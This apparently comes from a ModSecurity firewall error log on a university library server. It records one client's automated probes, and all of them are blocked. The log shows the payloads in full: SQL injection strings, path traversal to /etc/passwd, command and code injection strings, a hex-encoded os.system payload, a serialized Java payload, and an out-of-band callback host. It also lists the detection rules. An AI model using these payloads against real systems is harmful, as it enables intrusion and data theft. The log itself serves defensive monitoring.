[Tue Aug 29 11:35:16.400123 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVvlGgAAAAe"]
[Tue Aug 29 11:35:18.492159 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAATPtUoAAAAM"]
[Tue Aug 29 11:35:18.531732 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAATQXj4AAAAO"]
[Tue Aug 29 11:35:19.310298 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAVPX4QAAAAF"]
[Tue Aug 29 11:35:21.316465 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAAShCb8AAAAi"]
[Tue Aug 29 11:35:21.345051 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAATzVKoAAAAx"]
[Tue Aug 29 11:35:22.353171 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAVoCBAAAAAY"]
[Tue Aug 29 11:35:24.309465 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAAT2JTQAAAAz"]
[Tue Aug 29 11:35:24.339812 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATfd5wAAAAk"]
[Tue Aug 29 11:35:25.314324 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAATWYUkAAAAa"]
[Tue Aug 29 11:35:25.340612 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAATfd54AAAAk"]
[Tue Aug 29 11:35:26.348353 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVJXmsAAAAA"]
[Tue Aug 29 11:35:27.321225 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVmuMAAAAAT"]
[Tue Aug 29 11:35:27.340949 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVPX5MAAAAF"]
[Tue Aug 29 11:35:28.300999 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAVRxfIAAAAQ"]
[Tue Aug 29 11:35:29.301681 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAVr@SgAAAAZ"]
[Tue Aug 29 11:35:29.327324 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVr@SkAAAAZ"]
[Tue Aug 29 11:35:30.351010 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUR88gAAABI"]
[Tue Aug 29 11:35:32.306358 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAATWYVMAAAAa"]
[Tue Aug 29 11:35:32.351492 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAUUZ-QAAABK"]
[Tue Aug 29 11:35:32.351516 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAT9PSEAAAA1"]
[Tue Aug 29 11:35:33.305240 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAUJI1wAAABB"]
[Tue Aug 29 11:35:33.330969 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAPY1tMAAAAh"]
[Tue Aug 29 11:35:34.331532 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAUOaYEAAABG"]
[Tue Aug 29 11:35:34.336743 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAATWYVoAAAAa"]
[Tue Aug 29 11:35:34.370806 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUJI2AAAABB"]
[Tue Aug 29 11:35:35.393804 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAASEJboAAAAE"]
[Tue Aug 29 11:35:35.396865 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAT9PSkAAAA1"]
